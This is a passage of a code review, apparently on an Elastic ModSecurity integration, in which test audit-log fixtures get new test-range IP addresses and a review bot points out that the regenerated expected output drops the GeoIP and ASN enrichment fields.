)","reference":"o0,11v25,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} +{"transaction":{"client_ip":"67.43.156.15","time_stamp":"Fri May 14 15:11:52 
2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":40742,"host_ip":"67.43.156.15","host_port":443,"id":"162100511255.595254","request":{"method":"GET","http_version":1.1,"uri":"/","headers":{"Host":"34.87.56.16","Connection":"close"}},"response":{"http_code":200,"headers":{"Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","Set-Cookie":"_pmcapi_session=c94b2c408d9b56b91e00877fb6c21fca; path=/; HttpOnly","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"max-age=0, private, must-revalidate","ETag":"W/\"dda3a9b33849ca9d88844c0331e9b98f\"","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"200 OK","Connection":"close","X-Powered-By":"Phusion Passenger 6.0.2","Content-Type":"text/html; charset=utf-8","Content-Length":"12475","Date":"Fri, 14 May 2021 15:11:52 GMT","Server":"nginx/1.14.0","X-Request-Id":"63b9e1d0-481f-43b5-9ca3-e1606c48c338","X-Download-Options":"noopen","X-Runtime":"0.028032","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v21,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} +{"transaction":{"client_ip":"67.43.156.15","time_stamp":"Fri May 14 15:12:01 
2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":44460,"host_ip":"67.43.156.15","host_port":443,"id":"162100512158.550855","request":{"method":"GET","http_version":1.1,"uri":"/","headers":{"Host":"34.87.56.16","Connection":"close"}},"response":{"http_code":200,"headers":{"Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","Set-Cookie":"_pmcapi_session=db4a0ad600d22d8015c49062844b3ac9; path=/; HttpOnly","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"max-age=0, private, must-revalidate","ETag":"W/\"4b55096b2de9c691c0e0f67a496dc7d9\"","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"200 OK","Connection":"close","X-Powered-By":"Phusion Passenger 6.0.2","Content-Type":"text/html; charset=utf-8","Content-Length":"12475","Date":"Fri, 14 May 2021 15:12:01 GMT","Server":"nginx/1.14.0","X-Request-Id":"b7220068-a82e-4535-be4c-a087fe3901ed","X-Download-Options":"noopen","X-Runtime":"0.029745","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v21,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} +{"transaction":{"client_ip":"67.43.156.15","time_stamp":"Fri May 14 15:12:18 
2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":45952,"host_ip":"67.43.156.15","host_port":443,"id":"162100513893.802359","request":{"method":"GET","http_version":1.0,"uri":"/","headers":{"Host":"34.87.56.16","Connection":"close"}},"response":{"http_code":200,"headers":{"Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","Set-Cookie":"_pmcapi_session=e1e011a4d0188a1453cc4b8b9f3e476c; path=/; HttpOnly","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"max-age=0, private, must-revalidate","ETag":"W/\"f7e5c631964147f2a3458c4f97647883\"","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"200 OK","Connection":"close","X-Powered-By":"Phusion Passenger 6.0.2","Content-Type":"text/html; charset=utf-8","Content-Length":"12475","Date":"Fri, 14 May 2021 15:12:18 GMT","Server":"nginx/1.14.0","X-Request-Id":"15fa3f35-b204-4b2a-bbd8-7aec1d8e4417","X-Download-Options":"noopen","X-Runtime":"0.026203","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v21,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} 
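Review bot: The replacement only touches `client_ip` and `host_ip`; every new line still carries the public address `34.87.56.16` in the `Host` header and in the rule's `data` and `match` fields, so the fixture is not wholly inside the supported test subset the changelog entry describes. If those fields are not geo-enriched by the pipeline this may be deliberate, but it is worth either moving them into the same documented range or recording in the commit message why they were left as they are. The same `Host` value is carried through into the regenerated expected output's `event.original`.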
diff --git a/packages/modsecurity/data_stream/auditlog/_dev/test/pipeline/test-audit.log-expected.json b/packages/modsecurity/data_stream/auditlog/_dev/test/pipeline/test-audit.log-expected.json
index 3f9a108d8d4..d1a020c97c9 100644
--- a/packages/modsecurity/data_stream/auditlog/_dev/test/pipeline/test-audit.log-expected.json
+++ b/packages/modsecurity/data_stream/auditlog/_dev/test/pipeline/test-audit.log-expected.json
@@ -10,26 +10,8 @@
"id": "920350"
},
"source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "GB-ENG",
- "city_name": "London",
- "country_iso_code": "GB",
- "country_name": "United Kingdom",
- "region_name": "England",
- "location": {
- "lon": -0.0961,
- "lat": 51.5132
- }
- },
- "as": {
- "number": 63949,
- "organization": {
- "name": "Linode, LLC"
- }
- },
"port": 44464,
- "ip": "176.58.101.217"
+ "ip": "67.43.156.14"
},
"message": "Host header is a numeric IP address",
"url": {
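Review bot: The regenerated expectation for `67.43.156.14` drops the whole `source.geo` and `source.as` objects rather than replacing their values, so after this change the test no longer verifies the pipeline's GeoIP/ASN enrichment of `source.ip`, which is presumably the reason the test addresses were moved to a supported subset in the first place. It would be worth confirming the expected file was regenerated against a stack where the GeoIP databases were available, and, if the enrichment is intentionally out of scope for this test, saying so in the commit message. The hunks `@@ -91,23 +73,8 @@`, `@@ -156,23 +123,8 @@` and `@@ -221,23 +173,8 @@` for the other three events show the same pattern.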
@@ -57,8 +39,8 @@ } }, "event": { - "ingested": "2021-09-17T03:51:00.601664853Z", - "original": "{\"transaction\":{\"client_ip\":\"176.58.101.217\",\"time_stamp\":\"Fri May 14 14:52:47 2021\",\"server_id\":\"c06217c4ac0d6f8892d2489cd5d92aaceec2508e\",\"client_port\":44464,\"host_ip\":\"176.58.101.217\",\"host_port\":443,\"id\":\"162100396753.595789\",\"request\":{\"method\":\"GET\",\"http_version\":1.1,\"uri\":\"/owa/\",\"headers\":{\"Host\":\"34.87.56.16\",\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\",\"Accept\":\"*/*\",\"Accept-Encoding\":\"gzip\"}},\"response\":{\"http_code\":404,\"headers\":{\"Strict-Transport-Security\":\"max-age=31536000; includeSubDomains\",\"X-Runtime\":\"0.003894\",\"X-Powered-By\":\"Phusion Passenger 6.0.2\",\"Connection\":\"keep-alive\",\"Content-Encoding\":\"gzip\",\"Vary\":\"Origin\",\"Status\":\"404 Not Found\",\"X-Request-Id\":\"435c78d3-c122-4dee-8ca5-101397fab368\",\"Server\":\"nginx/1.14.0\",\"Content-Type\":\"text/html; charset=utf-8\",\"Date\":\"Fri, 14 May 2021 14:52:47 GMT\",\"Via\":\"1.1 google\"}},\"producer\":{\"modsecurity\":\"ModSecurity v3.0.2 (Linux)\",\"connector\":\"ModSecurity-nginx v0.1.1-beta\",\"secrules_engine\":\"Enabled\",\"components\":[\"OWASP_CRS/3.0.2\\\"\"]},\"messages\":[{\"message\":\"Host header is a numeric IP address\",\"details\":{\"match\":\"Matched \\\"Operator `Rx' with parameter `^[\\\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' 
)\",\"reference\":\"o0,11v25,11\",\"ruleId\":\"920350\",\"file\":\"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\"lineNumber\":\"733\",\"data\":\"34.87.56.16\",\"severity\":\"4\",\"ver\":\"OWASP_CRS/3.0.0\",\"rev\":\"2\",\"tags\":[\"application-multi\",\"language-multi\",\"platform-multi\",\"attack-protocol\",\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\",\"WASCTC/WASC-21\",\"OWASP_TOP_10/A7\",\"PCI/6.5.10\"],\"maturity\":\"9\",\"accuracy\":\"9\"}}]}}", + "ingested": "2021-12-09T13:41:30.594992100Z", + "original": "{\"transaction\":{\"client_ip\":\"67.43.156.14\",\"time_stamp\":\"Fri May 14 14:52:47 2021\",\"server_id\":\"c06217c4ac0d6f8892d2489cd5d92aaceec2508e\",\"client_port\":44464,\"host_ip\":\"67.43.156.14\",\"host_port\":443,\"id\":\"162100396753.595789\",\"request\":{\"method\":\"GET\",\"http_version\":1.1,\"uri\":\"/owa/\",\"headers\":{\"Host\":\"34.87.56.16\",\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\",\"Accept\":\"*/*\",\"Accept-Encoding\":\"gzip\"}},\"response\":{\"http_code\":404,\"headers\":{\"Strict-Transport-Security\":\"max-age=31536000; includeSubDomains\",\"X-Runtime\":\"0.003894\",\"X-Powered-By\":\"Phusion Passenger 6.0.2\",\"Connection\":\"keep-alive\",\"Content-Encoding\":\"gzip\",\"Vary\":\"Origin\",\"Status\":\"404 Not Found\",\"X-Request-Id\":\"435c78d3-c122-4dee-8ca5-101397fab368\",\"Server\":\"nginx/1.14.0\",\"Content-Type\":\"text/html; charset=utf-8\",\"Date\":\"Fri, 14 May 2021 14:52:47 GMT\",\"Via\":\"1.1 google\"}},\"producer\":{\"modsecurity\":\"ModSecurity v3.0.2 (Linux)\",\"connector\":\"ModSecurity-nginx v0.1.1-beta\",\"secrules_engine\":\"Enabled\",\"components\":[\"OWASP_CRS/3.0.2\\\"\"]},\"messages\":[{\"message\":\"Host header is a numeric IP address\",\"details\":{\"match\":\"Matched \\\"Operator `Rx' with parameter `^[\\\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' 
)\",\"reference\":\"o0,11v25,11\",\"ruleId\":\"920350\",\"file\":\"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\"lineNumber\":\"733\",\"data\":\"34.87.56.16\",\"severity\":\"4\",\"ver\":\"OWASP_CRS/3.0.0\",\"rev\":\"2\",\"tags\":[\"application-multi\",\"language-multi\",\"platform-multi\",\"attack-protocol\",\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\",\"WASCTC/WASC-21\",\"OWASP_TOP_10/A7\",\"PCI/6.5.10\"],\"maturity\":\"9\",\"accuracy\":\"9\"}}]}}",
"category": [
"web"
],
@@ -91,23 +73,8 @@
"id": "920350"
},
"source": {
- "geo": {
- "continent_name": "Asia",
- "country_name": "Singapore",
- "location": {
- "lon": 103.8,
- "lat": 1.3667
- },
- "country_iso_code": "SG"
- },
- "as": {
- "number": 132203,
- "organization": {
- "name": "Tencent Building, Kejizhongyi Avenue"
- }
- },
"port": 40742,
- "ip": "162.62.123.46"
+ "ip": "67.43.156.15"
},
"message": "Host header is a numeric IP address",
"url": {
@@ -135,8 +102,8 @@ } }, "event": { - "ingested": "2021-09-17T03:51:00.601675457Z", - "original": "{\"transaction\":{\"client_ip\":\"162.62.123.46\",\"time_stamp\":\"Fri May 14 15:11:52 2021\",\"server_id\":\"c06217c4ac0d6f8892d2489cd5d92aaceec2508e\",\"client_port\":40742,\"host_ip\":\"162.62.123.46\",\"host_port\":443,\"id\":\"162100511255.595254\",\"request\":{\"method\":\"GET\",\"http_version\":1.1,\"uri\":\"/\",\"headers\":{\"Host\":\"34.87.56.16\",\"Connection\":\"close\"}},\"response\":{\"http_code\":200,\"headers\":{\"Vary\":\"Accept-Encoding, Origin\",\"X-XSS-Protection\":\"1; mode=block\",\"Set-Cookie\":\"_pmcapi_session=c94b2c408d9b56b91e00877fb6c21fca; path=/; HttpOnly\",\"X-Permitted-Cross-Domain-Policies\":\"none\",\"Cache-Control\":\"max-age=0, private, must-revalidate\",\"ETag\":\"W/\\\"dda3a9b33849ca9d88844c0331e9b98f\\\"\",\"Strict-Transport-Security\":\"max-age=31536000; includeSubDomains\",\"Status\":\"200 OK\",\"Connection\":\"close\",\"X-Powered-By\":\"Phusion Passenger 6.0.2\",\"Content-Type\":\"text/html; charset=utf-8\",\"Content-Length\":\"12475\",\"Date\":\"Fri, 14 May 2021 15:11:52 GMT\",\"Server\":\"nginx/1.14.0\",\"X-Request-Id\":\"63b9e1d0-481f-43b5-9ca3-e1606c48c338\",\"X-Download-Options\":\"noopen\",\"X-Runtime\":\"0.028032\",\"X-Content-Type-Options\":\"nosniff\",\"X-Frame-Options\":\"SAMEORIGIN\",\"Via\":\"1.1 google\"}},\"producer\":{\"modsecurity\":\"ModSecurity v3.0.2 (Linux)\",\"connector\":\"ModSecurity-nginx v0.1.1-beta\",\"secrules_engine\":\"Enabled\",\"components\":[\"OWASP_CRS/3.0.2\\\"\"]},\"messages\":[{\"message\":\"Host header is a numeric IP address\",\"details\":{\"match\":\"Matched \\\"Operator `Rx' with parameter `^[\\\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' 
)\",\"reference\":\"o0,11v21,11\",\"ruleId\":\"920350\",\"file\":\"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\"lineNumber\":\"733\",\"data\":\"34.87.56.16\",\"severity\":\"4\",\"ver\":\"OWASP_CRS/3.0.0\",\"rev\":\"2\",\"tags\":[\"application-multi\",\"language-multi\",\"platform-multi\",\"attack-protocol\",\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\",\"WASCTC/WASC-21\",\"OWASP_TOP_10/A7\",\"PCI/6.5.10\"],\"maturity\":\"9\",\"accuracy\":\"9\"}}]}}", + "ingested": "2021-12-09T13:41:30.594995900Z", + "original": "{\"transaction\":{\"client_ip\":\"67.43.156.15\",\"time_stamp\":\"Fri May 14 15:11:52 2021\",\"server_id\":\"c06217c4ac0d6f8892d2489cd5d92aaceec2508e\",\"client_port\":40742,\"host_ip\":\"67.43.156.15\",\"host_port\":443,\"id\":\"162100511255.595254\",\"request\":{\"method\":\"GET\",\"http_version\":1.1,\"uri\":\"/\",\"headers\":{\"Host\":\"34.87.56.16\",\"Connection\":\"close\"}},\"response\":{\"http_code\":200,\"headers\":{\"Vary\":\"Accept-Encoding, Origin\",\"X-XSS-Protection\":\"1; mode=block\",\"Set-Cookie\":\"_pmcapi_session=c94b2c408d9b56b91e00877fb6c21fca; path=/; HttpOnly\",\"X-Permitted-Cross-Domain-Policies\":\"none\",\"Cache-Control\":\"max-age=0, private, must-revalidate\",\"ETag\":\"W/\\\"dda3a9b33849ca9d88844c0331e9b98f\\\"\",\"Strict-Transport-Security\":\"max-age=31536000; includeSubDomains\",\"Status\":\"200 OK\",\"Connection\":\"close\",\"X-Powered-By\":\"Phusion Passenger 6.0.2\",\"Content-Type\":\"text/html; charset=utf-8\",\"Content-Length\":\"12475\",\"Date\":\"Fri, 14 May 2021 15:11:52 GMT\",\"Server\":\"nginx/1.14.0\",\"X-Request-Id\":\"63b9e1d0-481f-43b5-9ca3-e1606c48c338\",\"X-Download-Options\":\"noopen\",\"X-Runtime\":\"0.028032\",\"X-Content-Type-Options\":\"nosniff\",\"X-Frame-Options\":\"SAMEORIGIN\",\"Via\":\"1.1 google\"}},\"producer\":{\"modsecurity\":\"ModSecurity v3.0.2 (Linux)\",\"connector\":\"ModSecurity-nginx 
v0.1.1-beta\",\"secrules_engine\":\"Enabled\",\"components\":[\"OWASP_CRS/3.0.2\\\"\"]},\"messages\":[{\"message\":\"Host header is a numeric IP address\",\"details\":{\"match\":\"Matched \\\"Operator `Rx' with parameter `^[\\\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )\",\"reference\":\"o0,11v21,11\",\"ruleId\":\"920350\",\"file\":\"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\"lineNumber\":\"733\",\"data\":\"34.87.56.16\",\"severity\":\"4\",\"ver\":\"OWASP_CRS/3.0.0\",\"rev\":\"2\",\"tags\":[\"application-multi\",\"language-multi\",\"platform-multi\",\"attack-protocol\",\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\",\"WASCTC/WASC-21\",\"OWASP_TOP_10/A7\",\"PCI/6.5.10\"],\"maturity\":\"9\",\"accuracy\":\"9\"}}]}}",
"category": [
"web"
],
@@ -156,23 +123,8 @@
"id": "920350"
},
"source": {
- "geo": {
- "continent_name": "Asia",
- "country_name": "Singapore",
- "location": {
- "lon": 103.8,
- "lat": 1.3667
- },
- "country_iso_code": "SG"
- },
- "as": {
- "number": 132203,
- "organization": {
- "name": "Tencent Building, Kejizhongyi Avenue"
- }
- },
"port": 44460,
- "ip": "162.62.123.46"
+ "ip": "67.43.156.15"
},
"message": "Host header is a numeric IP address",
"url": {
@@ -200,8 +152,8 @@ } }, "event": { - "ingested": "2021-09-17T03:51:00.601678749Z", - "original": "{\"transaction\":{\"client_ip\":\"162.62.123.46\",\"time_stamp\":\"Fri May 14 15:12:01 2021\",\"server_id\":\"c06217c4ac0d6f8892d2489cd5d92aaceec2508e\",\"client_port\":44460,\"host_ip\":\"162.62.123.46\",\"host_port\":443,\"id\":\"162100512158.550855\",\"request\":{\"method\":\"GET\",\"http_version\":1.1,\"uri\":\"/\",\"headers\":{\"Host\":\"34.87.56.16\",\"Connection\":\"close\"}},\"response\":{\"http_code\":200,\"headers\":{\"Vary\":\"Accept-Encoding, Origin\",\"X-XSS-Protection\":\"1; mode=block\",\"Set-Cookie\":\"_pmcapi_session=db4a0ad600d22d8015c49062844b3ac9; path=/; HttpOnly\",\"X-Permitted-Cross-Domain-Policies\":\"none\",\"Cache-Control\":\"max-age=0, private, must-revalidate\",\"ETag\":\"W/\\\"4b55096b2de9c691c0e0f67a496dc7d9\\\"\",\"Strict-Transport-Security\":\"max-age=31536000; includeSubDomains\",\"Status\":\"200 OK\",\"Connection\":\"close\",\"X-Powered-By\":\"Phusion Passenger 6.0.2\",\"Content-Type\":\"text/html; charset=utf-8\",\"Content-Length\":\"12475\",\"Date\":\"Fri, 14 May 2021 15:12:01 GMT\",\"Server\":\"nginx/1.14.0\",\"X-Request-Id\":\"b7220068-a82e-4535-be4c-a087fe3901ed\",\"X-Download-Options\":\"noopen\",\"X-Runtime\":\"0.029745\",\"X-Content-Type-Options\":\"nosniff\",\"X-Frame-Options\":\"SAMEORIGIN\",\"Via\":\"1.1 google\"}},\"producer\":{\"modsecurity\":\"ModSecurity v3.0.2 (Linux)\",\"connector\":\"ModSecurity-nginx v0.1.1-beta\",\"secrules_engine\":\"Enabled\",\"components\":[\"OWASP_CRS/3.0.2\\\"\"]},\"messages\":[{\"message\":\"Host header is a numeric IP address\",\"details\":{\"match\":\"Matched \\\"Operator `Rx' with parameter `^[\\\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' 
)\",\"reference\":\"o0,11v21,11\",\"ruleId\":\"920350\",\"file\":\"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\"lineNumber\":\"733\",\"data\":\"34.87.56.16\",\"severity\":\"4\",\"ver\":\"OWASP_CRS/3.0.0\",\"rev\":\"2\",\"tags\":[\"application-multi\",\"language-multi\",\"platform-multi\",\"attack-protocol\",\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\",\"WASCTC/WASC-21\",\"OWASP_TOP_10/A7\",\"PCI/6.5.10\"],\"maturity\":\"9\",\"accuracy\":\"9\"}}]}}", + "ingested": "2021-12-09T13:41:30.595002200Z", + "original": "{\"transaction\":{\"client_ip\":\"67.43.156.15\",\"time_stamp\":\"Fri May 14 15:12:01 2021\",\"server_id\":\"c06217c4ac0d6f8892d2489cd5d92aaceec2508e\",\"client_port\":44460,\"host_ip\":\"67.43.156.15\",\"host_port\":443,\"id\":\"162100512158.550855\",\"request\":{\"method\":\"GET\",\"http_version\":1.1,\"uri\":\"/\",\"headers\":{\"Host\":\"34.87.56.16\",\"Connection\":\"close\"}},\"response\":{\"http_code\":200,\"headers\":{\"Vary\":\"Accept-Encoding, Origin\",\"X-XSS-Protection\":\"1; mode=block\",\"Set-Cookie\":\"_pmcapi_session=db4a0ad600d22d8015c49062844b3ac9; path=/; HttpOnly\",\"X-Permitted-Cross-Domain-Policies\":\"none\",\"Cache-Control\":\"max-age=0, private, must-revalidate\",\"ETag\":\"W/\\\"4b55096b2de9c691c0e0f67a496dc7d9\\\"\",\"Strict-Transport-Security\":\"max-age=31536000; includeSubDomains\",\"Status\":\"200 OK\",\"Connection\":\"close\",\"X-Powered-By\":\"Phusion Passenger 6.0.2\",\"Content-Type\":\"text/html; charset=utf-8\",\"Content-Length\":\"12475\",\"Date\":\"Fri, 14 May 2021 15:12:01 GMT\",\"Server\":\"nginx/1.14.0\",\"X-Request-Id\":\"b7220068-a82e-4535-be4c-a087fe3901ed\",\"X-Download-Options\":\"noopen\",\"X-Runtime\":\"0.029745\",\"X-Content-Type-Options\":\"nosniff\",\"X-Frame-Options\":\"SAMEORIGIN\",\"Via\":\"1.1 google\"}},\"producer\":{\"modsecurity\":\"ModSecurity v3.0.2 (Linux)\",\"connector\":\"ModSecurity-nginx 
v0.1.1-beta\",\"secrules_engine\":\"Enabled\",\"components\":[\"OWASP_CRS/3.0.2\\\"\"]},\"messages\":[{\"message\":\"Host header is a numeric IP address\",\"details\":{\"match\":\"Matched \\\"Operator `Rx' with parameter `^[\\\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )\",\"reference\":\"o0,11v21,11\",\"ruleId\":\"920350\",\"file\":\"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\"lineNumber\":\"733\",\"data\":\"34.87.56.16\",\"severity\":\"4\",\"ver\":\"OWASP_CRS/3.0.0\",\"rev\":\"2\",\"tags\":[\"application-multi\",\"language-multi\",\"platform-multi\",\"attack-protocol\",\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\",\"WASCTC/WASC-21\",\"OWASP_TOP_10/A7\",\"PCI/6.5.10\"],\"maturity\":\"9\",\"accuracy\":\"9\"}}]}}",
"category": [
"web"
],
@@ -221,23 +173,8 @@
"id": "920350"
},
"source": {
- "geo": {
- "continent_name": "Asia",
- "country_name": "Singapore",
- "location": {
- "lon": 103.8,
- "lat": 1.3667
- },
- "country_iso_code": "SG"
- },
- "as": {
- "number": 132203,
- "organization": {
- "name": "Tencent Building, Kejizhongyi Avenue"
- }
- },
"port": 45952,
- "ip": "162.62.123.46"
+ "ip": "67.43.156.15"
},
"message": "Host header is a numeric IP address",
"url": {
@@ -265,8 +202,8 @@ } }, "event": { - "ingested": "2021-09-17T03:51:00.601681843Z", - "original": "{\"transaction\":{\"client_ip\":\"162.62.123.46\",\"time_stamp\":\"Fri May 14 15:12:18 2021\",\"server_id\":\"c06217c4ac0d6f8892d2489cd5d92aaceec2508e\",\"client_port\":45952,\"host_ip\":\"162.62.123.46\",\"host_port\":443,\"id\":\"162100513893.802359\",\"request\":{\"method\":\"GET\",\"http_version\":1.0,\"uri\":\"/\",\"headers\":{\"Host\":\"34.87.56.16\",\"Connection\":\"close\"}},\"response\":{\"http_code\":200,\"headers\":{\"Vary\":\"Accept-Encoding, Origin\",\"X-XSS-Protection\":\"1; mode=block\",\"Set-Cookie\":\"_pmcapi_session=e1e011a4d0188a1453cc4b8b9f3e476c; path=/; HttpOnly\",\"X-Permitted-Cross-Domain-Policies\":\"none\",\"Cache-Control\":\"max-age=0, private, must-revalidate\",\"ETag\":\"W/\\\"f7e5c631964147f2a3458c4f97647883\\\"\",\"Strict-Transport-Security\":\"max-age=31536000; includeSubDomains\",\"Status\":\"200 OK\",\"Connection\":\"close\",\"X-Powered-By\":\"Phusion Passenger 6.0.2\",\"Content-Type\":\"text/html; charset=utf-8\",\"Content-Length\":\"12475\",\"Date\":\"Fri, 14 May 2021 15:12:18 GMT\",\"Server\":\"nginx/1.14.0\",\"X-Request-Id\":\"15fa3f35-b204-4b2a-bbd8-7aec1d8e4417\",\"X-Download-Options\":\"noopen\",\"X-Runtime\":\"0.026203\",\"X-Content-Type-Options\":\"nosniff\",\"X-Frame-Options\":\"SAMEORIGIN\",\"Via\":\"1.1 google\"}},\"producer\":{\"modsecurity\":\"ModSecurity v3.0.2 (Linux)\",\"connector\":\"ModSecurity-nginx v0.1.1-beta\",\"secrules_engine\":\"Enabled\",\"components\":[\"OWASP_CRS/3.0.2\\\"\"]},\"messages\":[{\"message\":\"Host header is a numeric IP address\",\"details\":{\"match\":\"Matched \\\"Operator `Rx' with parameter `^[\\\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' 
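Review bot: The regenerated expectation drops `source.geo` and `source.as` entirely instead of replacing them with the values for the new address, so this test no longer asserts on whatever geoip/ASN enrichment produced the Singapore/Tencent block for 162.62.123.46 in the old output. Since 67.43.156.15 was picked precisely because it falls in the subset the test GeoIP databases cover, the enrichment presumably still fires in the pipeline, and the file was likely regenerated against an Elasticsearch that had no GeoIP databases loaded; it is worth re-running the pipeline tests with the bundled test databases and keeping populated `source.geo` and `source.as` objects so the processor stays covered. If the geoip step was intentionally removed from the pipeline, that should be called out in the 0.1.2 changelog entry rather than folded into a "test IPs" bugfix. The enclosing event object starts and ends outside this hunk.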
)\",\"reference\":\"o0,11v21,11\",\"ruleId\":\"920350\",\"file\":\"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\"lineNumber\":\"733\",\"data\":\"34.87.56.16\",\"severity\":\"4\",\"ver\":\"OWASP_CRS/3.0.0\",\"rev\":\"2\",\"tags\":[\"application-multi\",\"language-multi\",\"platform-multi\",\"attack-protocol\",\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\",\"WASCTC/WASC-21\",\"OWASP_TOP_10/A7\",\"PCI/6.5.10\"],\"maturity\":\"9\",\"accuracy\":\"9\"}}]}}", + "ingested": "2021-12-09T13:41:30.595009200Z", + "original": "{\"transaction\":{\"client_ip\":\"67.43.156.15\",\"time_stamp\":\"Fri May 14 15:12:18 2021\",\"server_id\":\"c06217c4ac0d6f8892d2489cd5d92aaceec2508e\",\"client_port\":45952,\"host_ip\":\"67.43.156.15\",\"host_port\":443,\"id\":\"162100513893.802359\",\"request\":{\"method\":\"GET\",\"http_version\":1.0,\"uri\":\"/\",\"headers\":{\"Host\":\"34.87.56.16\",\"Connection\":\"close\"}},\"response\":{\"http_code\":200,\"headers\":{\"Vary\":\"Accept-Encoding, Origin\",\"X-XSS-Protection\":\"1; mode=block\",\"Set-Cookie\":\"_pmcapi_session=e1e011a4d0188a1453cc4b8b9f3e476c; path=/; HttpOnly\",\"X-Permitted-Cross-Domain-Policies\":\"none\",\"Cache-Control\":\"max-age=0, private, 